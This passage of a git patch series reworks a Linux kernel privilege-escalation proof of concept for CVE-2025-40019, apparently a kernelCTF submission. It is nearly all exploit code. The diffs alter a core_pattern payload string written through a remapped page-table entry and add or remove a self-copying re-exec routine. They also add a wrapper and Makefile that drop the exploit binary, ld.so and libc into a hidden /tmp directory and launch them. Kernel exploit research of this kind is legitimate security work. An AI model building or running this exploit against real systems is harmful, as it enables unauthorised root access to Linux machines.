setenv("EXP505_REEXEC", "1", 1); + execl("/tmp/ex", "/tmp/ex", NULL); + } + close(in); +} + /* * Build the authenc key blob used by both the sacrificial and ESSIV sockets. * Layout: [4-byte RTA len][4-byte AES keylen][32-byte HMAC key][16-byte AES key] @@ -825,6 +849,8 @@ int main(int argc, char **argv) root_payload(argv[1]); } + normalize_exec_path(argv); + /* --- Step 0: Set up IPC and fork for two-pass exploit --- */ static char data_buf[0x1000000]; /* 16 MB general-purpose data buffer */ int unix_sockfd[2]; From 1e614f7f15bd822da13a5a53ed3c3ff4e3d0cb35 Mon Sep 17 00:00:00 2001 From: Shinkurt <9161100+Shinkurt@users.noreply.github.com> Date: Sat, 9 May 2026 13:29:55 -0400 Subject: [PATCH 9/9] Wrap exp505 repro payload with matching glibc --- .../exploit/mitigation-v4-6.12/Makefile | 21 ++++--- .../exploit/mitigation-v4-6.12/exploit.c | 30 +-------- .../exploit/mitigation-v4-6.12/wrapper.c | 63 +++++++++++++++++++ 3 files changed, 78 insertions(+), 36 deletions(-) create mode 100644 pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/wrapper.c diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile index a922ca238..65c989aeb 100644 --- a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile @@ -1,16 +1,21 @@ CC ?= gcc CFLAGS ?= -O2 -w -DMIT_612 DEBUG_CFLAGS ?= -O2 -g -w -DMIT_612 -LDFLAGS ?= -static +STATIC_LDFLAGS ?= -static all: exploit -exploit: exploit.c - @if [ "$@" = "exploit_debug" ]; then \ - $(CC) -B/usr/bin/ $(DEBUG_CFLAGS) -o $@ $< $(LDFLAGS); \ - else \ - $(CC) -B/usr/bin/ $(CFLAGS) -o $@ $< $(LDFLAGS); \ - fi +exploit: exploit.c wrapper.c + $(CC) -B/usr/bin/ $(CFLAGS) -o payload_bin exploit.c + cp /lib64/ld-linux-x86-64.so.2 ld_bin + if [ -e /lib/x86_64-linux-gnu/libc.so.6 ]; then cp /lib/x86_64-linux-gnu/libc.so.6 libc_bin; else cp /usr/lib64/libc.so.6 libc_bin; fi + ld -r -b binary -o payload_bin.o payload_bin + ld -r -b binary -o ld_bin.o ld_bin + ld -r -b binary -o libc_bin.o libc_bin + $(CC) -B/usr/bin/ -O2 -w $(STATIC_LDFLAGS) -o exploit wrapper.c payload_bin.o ld_bin.o libc_bin.o + +exploit_debug: exploit.c + $(CC) -B/usr/bin/ $(DEBUG_CFLAGS) -o $@ $< $(STATIC_LDFLAGS) clean: - rm -f exploit exploit_debug + rm -f exploit exploit_debug payload_bin ld_bin libc_bin payload_bin.o ld_bin.o libc_bin.o diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c index cef78de98..c07ab8e62 100644 --- a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c @@ -476,8 +476,8 @@ static void sha256(const uint8_t *data, size_t datalen, uint8_t *hash_out) #define ESSIV_SENDMSG_LEN 0x20 /* core_pattern payload written through the remapped PTE */ -#define CORE_PATTERN_PAYLOAD "|/proc/%P/root/tmp/ex %P" -#define PUD_PROBE_COUNT 16 +#define CORE_PATTERN_PAYLOAD "|/proc/%P/root/tmp/exp/exploit %P" +#define PUD_PROBE_COUNT 3 /* ------------------------------------------------------------------ */ /* ESSIV IV pre-computation (embedded AES-256-ECB + SHA-256) */ @@ -526,30 +526,6 @@ static void pin_cpu(int cpu) sched_setaffinity(0, sizeof(mask), &mask); } -static void normalize_exec_path(char **argv) -{ - if (!strcmp(argv[0], "/tmp/ex") || getenv("EXP505_REEXEC")) - return; - - int in = open(argv[0], O_RDONLY); - if (in < 0) - return; - - int out = open("/tmp/ex", O_WRONLY | O_CREAT | O_TRUNC, 0755); - if (out >= 0) { - char buf[0x4000]; - ssize_t n; - while ((n = read(in, buf, sizeof(buf))) > 0) - if (write(out, buf, n) != n) - break; - close(out); - chmod("/tmp/ex", 0755); - setenv("EXP505_REEXEC", "1", 1); - execl("/tmp/ex", "/tmp/ex", NULL); - } - close(in); -} - /* * Build the authenc key blob used by both the sacrificial and ESSIV sockets. * Layout: [4-byte RTA len][4-byte AES keylen][32-byte HMAC key][16-byte AES key] @@ -849,8 +825,6 @@ int main(int argc, char **argv) root_payload(argv[1]); } - normalize_exec_path(argv); - /* --- Step 0: Set up IPC and fork for two-pass exploit --- */ static char data_buf[0x1000000]; /* 16 MB general-purpose data buffer */ int unix_sockfd[2]; diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/wrapper.c b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/wrapper.c new file mode 100644 index 000000000..841d77fab --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/wrapper.c @@ -0,0 +1,63 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include + +extern const unsigned char _binary_payload_bin_start[]; +extern const unsigned char _binary_payload_bin_end[]; +extern const unsigned char _binary_ld_bin_start[]; +extern const unsigned char _binary_ld_bin_end[]; +extern const unsigned char _binary_libc_bin_start[]; +extern const unsigned char _binary_libc_bin_end[]; + +static void write_blob(const char *path, const unsigned char *start, + const unsigned char *end, mode_t mode) +{ + int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode); + if (fd < 0) { + perror(path); + _exit(127); + } + + const unsigned char *p = start; + while (p < end) { + ssize_t n = write(fd, p, end - p); + if (n < 0) { + if (errno == EINTR) + continue; + perror("write"); + _exit(127); + } + p += n; + } + close(fd); + chmod(path, mode); +} + +int main(int argc, char **argv) +{ + const char *dir = "/tmp/exp/.exp505"; + const char *payload = "/tmp/exp/.exp505/payload"; + const char *ldso = "/tmp/exp/.exp505/ld-linux-x86-64.so.2"; + const char *libc = "/tmp/exp/.exp505/libc.so.6"; + + mkdir("/tmp/exp", 0755); + mkdir(dir, 0755); + write_blob(payload, _binary_payload_bin_start, _binary_payload_bin_end, 0755); + write_blob(ldso, _binary_ld_bin_start, _binary_ld_bin_end, 0755); + write_blob(libc, _binary_libc_bin_start, _binary_libc_bin_end, 0755); + + if (argc > 1) { + execl(ldso, ldso, "--library-path", dir, payload, argv[1], NULL); + } else { + execl(ldso, ldso, "--library-path", dir, payload, NULL); + } + + perror("exec payload"); + return 127; +}